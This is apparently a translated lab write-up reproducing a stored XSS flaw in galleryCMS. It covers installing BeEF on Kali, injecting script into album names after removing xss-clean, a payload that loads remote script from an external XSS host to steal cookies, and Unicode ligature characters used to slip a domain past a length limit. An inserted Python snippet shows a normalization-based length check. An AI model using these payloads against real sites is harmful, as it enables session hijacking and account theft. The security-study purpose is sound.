Duplicate gallerycms character length limit short domain name bypass
2022-07-26 18:29:00 【Orange oak】
First, before starting the experiment, go online on kali and install beef-xss.
1. On the command line enter apt install beef-xss.
2. It may fail with an error like this, so I tried updating, i.e. entering the commands apt-get update and apt-get upgrade.
However, I still got an error when typing them; the output looked like this.
3. I searched Baidu for a solution to the last message, “Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution)”, which is simply to run apt --fix-broken install.
But the article I found was still doing the update, i.e. the second item, so I did that too and waited for it to download, and waited, for a long time. I also forgot whether I had to pause it or wait until it finished; then I figured it had probably finished and the update was no longer needed. Then I ran the install command again,
4. After a successful install, just run beef-xss directly.
While it runs it will ask you to change the password; set it to whatever you like, it is not echoed.
And then it's done.
5. In the browser, enter 192.168.121.135:3000/ui/panel in the address bar, and you will be asked for an account and password. If the configuration file has not been modified, the default account is beef, and the password is the one you set the first time you ran it.
Setting up the galleryCMS server.
1. First extract the package into the phpstudy_pro/WWW directory, then find the file application/config/database.php
and change the database user name and password in that file to match the ones on your local machine.
2. Start phpStudy, start the web server and the database, then add a new website, point its root directory to the GalleryCMS folder you just extracted, and set the domain name to that folder name. After that, restart the Apache and MySQL services.
3. Because I open the page from the browser in kali, first check the IP address of the local service:
open CMD and use ipconfig to see the IP. Enter that IP in the kali browser and you can reach the page, but the page shows errors. (I fixed it in one go and forgot the screenshot, so there is no picture of the error.)
4. From the error displayed it can be seen that it is a server-side error, so open MySQL, create the database gallaycms and use it. Going back to the browser, you can see that registration succeeds, but there are still errors after logging in, so there is still a problem with the database: the column is too short for the value being inserted, so we need to lengthen it.
Run this statement in the database: alter table user modify last_ip varchar(100) not null default '127.0.0.1';
Then there is another statement in the error report (starting with insert; I did not note the details). Copy and paste that statement into MySQL, then go back to the kali browser, log in again, and we can get in.
Starting the reproduction
First, when creating a new album, enter any name and submit it,
In F12 you can see that the value just entered is passed into an a tag.
So look at the source: it outputs the URL directly. I also saw that adding an album goes through the add method, which trims whitespace at both ends, makes the field required, sets a default max length of 45, and uses xss-clean.
xss-clean: converts some symbols into entities and filters some keywords.
Because it filters a lot of tags, first remove xss-clean, then create a name containing a <script> tag.
When you return to the album listing it pops up, because it was stored when the album was created, so every time you open the page it is executed.
Here we can use js code.
So, to get the other party's cookie, let's try $.getScript(“//trlsm.xss.ht”),
But as the picture shows, even using the shortest form it is still too many bytes, so we just need to change this length,
In the source code the maximum character length specified is 35.
Although xss-clean filters many tags, it has not filtered the <svg> tag, so use an <svg> tag to test.
- ﬀ expands to ff
- ℠ expands to sm
- ㏛ expands to sr
- ﬆ expands to st
- ㎭ expands to rad
- ℡ expands to tel
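The expansions listed above are Unicode compatibility mappings, which is why a per-character length limit does not bound the length of what a browser actually resolves. The following is an added example (not from the post or from galleryCMS) that reproduces the table with NFKC normalization and shows a length check measured on the expanded form; the ligature code points U+FB00 and U+FB06 are assumed for the "ff" and "st" entries, and the 35-character limit is the one the post reports.

```python
import unicodedata

# Constructed list of the compatibility characters the post lists.
# Assumption: the "ff" and "st" entries are the ligatures U+FB00 and U+FB06.
COMPAT_CHARS = ["\ufb00", "\u2120", "\u33db", "\ufb06", "\u33ad", "\u2121"]

MAX_NAME_LEN = 35  # album-name limit the post reports for galleryCMS


def canonical(s):
    """Expand compatibility characters the way a URL host ends up being
    interpreted: NFKC normalization, then lower-casing (host names are
    case-insensitive, and IDNA mapping lower-cases as well)."""
    return unicodedata.normalize("NFKC", s).lower()


def lengths(s):
    """Return (code points as typed, code points after expansion)."""
    return len(s), len(canonical(s))


def name_within_limit(name, limit=MAX_NAME_LEN):
    """Naive check: count characters exactly as typed.  This is all a plain
    max-length rule sees, so a ligature counts as one character."""
    return len(name) <= limit


def name_within_limit_canonical(name, limit=MAX_NAME_LEN):
    """Hardened check: measure the expanded form, so compatibility
    characters cannot hide extra length from the limit."""
    return len(canonical(name)) <= limit


if __name__ == "__main__":
    for ch in COMPAT_CHARS:
        print(f"U+{ord(ch):04X} {ch} -> {canonical(ch)}")
    sample = "".join(COMPAT_CHARS)
    print("typed vs expanded length:", lengths(sample))
    # Twelve ℡ pass the naive check but expand to 36 characters.
    print(name_within_limit("\u2121" * 12), name_within_limit_canonical("\u2121" * 12))
```

A length limit is not an XSS control in any case; the normalized-length check only closes the specific accounting gap the post exploits, and the album name still needs proper output encoding where it is written into the a tag.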
Then I tried to use the teacher's domain name, but because there is no documentation, you can't change the public IP to the local one, and I don't have my own domain name, so I could only relax the character length limit and test with an IP. You can see that beef has it.
